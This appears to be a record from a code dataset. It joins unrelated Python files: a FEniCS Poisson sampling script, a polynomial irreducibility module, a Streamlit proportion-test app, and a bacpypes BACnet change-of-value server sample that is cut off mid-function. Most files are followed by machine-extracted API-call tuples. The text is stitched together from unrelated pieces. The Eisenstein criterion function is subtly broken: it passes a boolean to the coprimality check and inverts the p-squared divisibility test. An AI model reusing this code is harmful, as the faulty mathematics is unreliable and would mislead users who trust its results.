'ops.audio.cutout', 'cutout', (["transformed['audio']", 'self.area'], {}), "(transformed['audio'], self.area)\n", (6698, 6731), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((7104, 7159), 'numpy.random.randint', 'np.random.randint', (['(0)', "(inputs['audio'].size - max_length)"], {}), "(0, inputs['audio'].size - max_length)\n", (7121, 7159), True, 'import numpy as np\n'), ((2349, 2373), 'random.uniform', 'random.uniform', (['(0.9)', '(1.1)'], {}), '(0.9, 1.1)\n', (2363, 2373), False, 'import random\n'), ((5038, 5145), 'ops.audio.compute_stft', 'compute_stft', (["inputs['audio']"], {'window_size': 'self.n_fft', 'hop_size': 
'self.hop_size', 'eps': 'self.eps', 'log': '(False)'}), "(inputs['audio'], window_size=self.n_fft, hop_size=self.\n hop_size, eps=self.eps, log=False)\n", (5050, 5145), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((5240, 5275), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (5254, 5275), True, 'import numpy as np\n'), ((5354, 5389), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (5368, 5389), True, 'import numpy as np\n'), ((5761, 5798), 'numpy.random.uniform', 'np.random.uniform', (['self.min', 'self.max'], {}), '(self.min, self.max)\n', (5778, 5798), True, 'import numpy as np\n'), ((2301, 2324), 'random.randrange', 'random.randrange', (['(2)', '(10)'], {}), '(2, 10)\n', (2317, 2324), False, 'import random\n'), ((2240, 2267), 'random.randrange', 'random.randrange', (['(-300)', '(300)'], {}), '(-300, 300)\n', (2256, 2267), False, 'import random\n'), ((1978, 2005), 'pysndfx.AudioEffectsChain', 'pysndfx.AudioEffectsChain', ([], {}), '()\n', (2003, 2005), False, 'import pysndfx\n'), ((2064, 2084), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2080, 2084), False, 'import random\n'), ((2117, 2137), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2133, 2137), False, 'import random\n'), ((2172, 2192), 'random.randrange', 'random.randrange', (['(50)'], {}), '(50)\n', (2188, 2192), False, 'import random\n')] |
#!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| [
"fenics.Point",
"numpy.random.rand",
"argparse.ArgumentParser",
"fenics.set_log_level",
"numpy.random.randn",
"fenics.File",
"newpoisson.poisson"
]
| [((261, 278), 'fenics.set_log_level', 'set_log_level', (['(40)'], {}), '(40)\n', (274, 278), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((203, 214), 'fenics.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (208, 214), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((215, 226), 'fenics.Point', 'Point', (['(1)', '(1)'], {}), '(1, 1)\n', (220, 226), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((425, 479), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Poisson Problem"""'}), "(description='Poisson Problem')\n", (448, 479), False, 'import argparse\n'), ((1580, 1607), 'newpoisson.poisson', 'poisson', ([], {'gamma': 'g', 'mesh': 'mesh'}), '(gamma=g, mesh=mesh)\n', (1587, 1607), False, 'from newpoisson import poisson\n'), ((1206, 1244), 'numpy.random.randn', 'np.random.randn', (['num_samples', 'inputdim'], {}), '(num_samples, inputdim)\n', (1221, 1244), True, 'import numpy as np\n'), ((1708, 1724), 'fenics.File', 'File', (['fname', '"""w"""'], {}), "(fname, 'w')\n", (1712, 1724), False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((1109, 1136), 'numpy.random.rand', 'np.random.rand', (['num_samples'], {}), '(num_samples)\n', (1123, 1136), True, 'import numpy as np\n'), ((1300, 1337), 'numpy.random.rand', 'np.random.rand', (['num_samples', 'inputdim'], {}), '(num_samples, inputdim)\n', (1314, 1337), True, 'import numpy as np\n')] |
"""
Irreduzibilitätskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
def factor(n):
# Faktorisierung einer Zahl n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
# Primfaktorzerlegung einer Zahl n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen würden Ergebnis von HCF verfälschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prüft ein Polynom auf Irreduzierbarkeit (Perron).
Führender Koeffizient != 1 funktioniert nicht.
Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung für Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| [
"itertools.combinations",
"helper.prime_factor",
"logging.error",
"helper.is_polynomial_coprime"
]
| [((1295, 1341), 'itertools.combinations', 'itertools.combinations', (['non_zero_polynomial', '(2)'], {}), '(non_zero_polynomial, 2)\n', (1317, 1341), False, 'import itertools\n'), ((2755, 2804), 'helper.is_polynomial_coprime', 'helper.is_polynomial_coprime', (['(polynomial is False)'], {}), '(polynomial is False)\n', (2783, 2804), False, 'import helper\n'), ((3144, 3176), 'helper.prime_factor', 'helper.prime_factor', (['const_coeff'], {}), '(const_coeff)\n', (3163, 3176), False, 'import helper\n'), ((1800, 1833), 'logging.error', 'logging.error', (['"""Polynom ungültig"""'], {}), "('Polynom ungültig')\n", (1813, 1833), False, 'import logging\n')] |
import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
| [
"streamlit.markdown",
"math.sqrt",
"streamlit.write",
"streamlit.radio",
"streamlit.sidebar.radio",
"streamlit.sidebar.subheader",
"streamlit.subheader",
"streamlit.text_input",
"pandas.DataFrame",
"streamlit.columns",
"numpy.arange"
]
| [((162, 189), 'streamlit.subheader', 'st.subheader', (['"""Proportions"""'], {}), "('Proportions')\n", (174, 189), True, 'import streamlit as st\n'), ((194, 237), 'streamlit.sidebar.subheader', 'st.sidebar.subheader', (['"""Proportion Settings"""'], {}), "('Proportion Settings')\n", (214, 237), True, 'import streamlit as st\n'), ((256, 315), 'streamlit.sidebar.radio', 'st.sidebar.radio', (['""""""', "['One Proportion', 'Two Proportions']"], {}), "('', ['One Proportion', 'Two Proportions'])\n", (272, 315), True, 'import streamlit as st\n'), ((378, 391), 'streamlit.columns', 'st.columns', (['(3)'], {}), '(3)\n', (388, 391), True, 'import streamlit as st\n'), ((780, 793), 'streamlit.columns', 'st.columns', (['(1)'], {}), '(1)\n', (790, 793), True, 'import streamlit as st\n'), ((3287, 3300), 'streamlit.columns', 'st.columns', (['(3)'], {}), '(3)\n', (3297, 3300), True, 'import streamlit as st\n'), ((3754, 3767), 'streamlit.columns', 'st.columns', (['(1)'], {}), '(1)\n', (3764, 3767), True, 'import streamlit as st\n'), ((655, 682), 'streamlit.markdown', 'st.markdown', (['"""Pick a test:"""'], {}), "('Pick a test:')\n", (666, 682), True, 'import streamlit as st\n'), ((709, 763), 'streamlit.radio', 'st.radio', (['""""""', "['Left Tail', 'Two Tails', 'Right Tail']"], {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])\n", (717, 763), True, 'import streamlit as st\n'), ((857, 891), 'math.sqrt', 'math.sqrt', (['(nullp * (1 - nullp) / n)'], {}), '(nullp * (1 - nullp) / n)\n', (866, 891), False, 'import math\n'), ((905, 939), 'math.sqrt', 'math.sqrt', (['(p_hat * (1 - p_hat) / n)'], {}), '(p_hat * (1 - p_hat) / n)\n', (914, 939), False, 'import math\n'), ((986, 1007), 'numpy.arange', 'np.arange', (['(-4)', '(4)', '(0.1)'], {}), '(-4, 4, 0.1)\n', (995, 1007), True, 'import numpy as np\n'), ((1051, 1081), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': x, 'y': y}"], {}), "({'x': x, 'y': y})\n", (1063, 1081), True, 'import pandas as pd\n'), ((2693, 2835), 'pandas.DataFrame', 'pd.DataFrame', (["{'p-Hat': p_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD': tsd,\n 'C-Level': cl, 'CI SE': cise, 'ME': rme}"], {'index': '[0]'}), "({'p-Hat': p_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz,\n 'Test SD': tsd, 'C-Level': cl, 'CI SE': cise, 'ME': rme}, index=[0])\n", (2705, 2835), True, 'import pandas as pd\n'), ((2832, 2846), 'streamlit.write', 'st.write', (['data'], {}), '(data)\n', (2840, 2846), True, 'import streamlit as st\n'), ((3629, 3656), 'streamlit.markdown', 'st.markdown', (['"""Pick a test:"""'], {}), "('Pick a test:')\n", (3640, 3656), True, 'import streamlit as st\n'), ((3683, 3737), 'streamlit.radio', 'st.radio', (['""""""', "['Left Tail', 'Two Tails', 'Right Tail']"], {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])\n", (3691, 3737), True, 'import streamlit as st\n'), ((4028, 4074), 'math.sqrt', 'math.sqrt', (['(pp_hat * pq_hat * (1 / n1 + 1 / n2))'], {}), '(pp_hat * pq_hat * (1 / n1 + 1 / n2))\n', (4037, 4074), False, 'import math\n'), ((4084, 4138), 'math.sqrt', 'math.sqrt', (['(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)'], {}), '(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)\n', (4093, 4138), False, 'import math\n'), ((4196, 4217), 'numpy.arange', 'np.arange', (['(-4)', '(4)', '(0.1)'], {}), '(-4, 4, 0.1)\n', (4205, 4217), True, 'import numpy as np\n'), ((4261, 4291), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': x, 'y': y}"], {}), "({'x': x, 'y': y})\n", (4273, 4291), True, 'import pandas as pd\n'), ((5915, 6129), 'pandas.DataFrame', 'pd.DataFrame', (["{'p-Hat 1': p_hat1, 'p-Hat 2': 
p_hat2, 'Pooled p-Hat': pp_hat, 'Diff p-Hat':\n dp_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD': tsd,\n 'C-Level': cl, 'CI SE': cise, 'ME': rme}"], {'index': '[0]'}), "({'p-Hat 1': p_hat1, 'p-Hat 2': p_hat2, 'Pooled p-Hat': pp_hat,\n 'Diff p-Hat': dp_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD':\n tsd, 'C-Level': cl, 'CI SE': cise, 'ME': rme}, index=[0])\n", (5927, 6129), True, 'import pandas as pd\n'), ((6116, 6130), 'streamlit.write', 'st.write', (['data'], {}), '(data)\n', (6124, 6130), True, 'import streamlit as st\n'), ((429, 454), 'streamlit.text_input', 'st.text_input', (['"""Hits"""', '(20)'], {}), "('Hits', 20)\n", (442, 454), True, 'import streamlit as st\n'), ((475, 501), 'streamlit.text_input', 'st.text_input', (['"""Tries"""', '(25)'], {}), "('Tries', 25)\n", (488, 501), True, 'import streamlit as st\n'), ((545, 572), 'streamlit.text_input', 'st.text_input', (['"""Null:"""', '(0.7)'], {}), "('Null:', 0.7)\n", (558, 572), True, 'import streamlit as st\n'), ((598, 626), 'streamlit.text_input', 'st.text_input', (['"""Alpha"""', '(0.05)'], {}), "('Alpha', 0.05)\n", (611, 626), True, 'import streamlit as st\n'), ((3339, 3366), 'streamlit.text_input', 'st.text_input', (['"""Hits 1"""', '(20)'], {}), "('Hits 1', 20)\n", (3352, 3366), True, 'import streamlit as st\n'), ((3388, 3416), 'streamlit.text_input', 'st.text_input', (['"""Tries 1"""', '(25)'], {}), "('Tries 1', 25)\n", (3401, 3416), True, 'import streamlit as st\n'), ((3468, 3495), 'streamlit.text_input', 'st.text_input', (['"""Hits 2"""', '(30)'], {}), "('Hits 2', 30)\n", (3481, 3495), True, 'import streamlit as st\n'), ((3517, 3545), 'streamlit.text_input', 'st.text_input', (['"""Tries 2"""', '(50)'], {}), "('Tries 2', 50)\n", (3530, 3545), True, 'import streamlit as st\n'), ((3589, 3617), 'streamlit.text_input', 'st.text_input', (['"""Alpha"""', '(0.05)'], {}), "('Alpha', 0.05)\n", (3602, 3617), True, 'import streamlit as st\n')] |
#!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
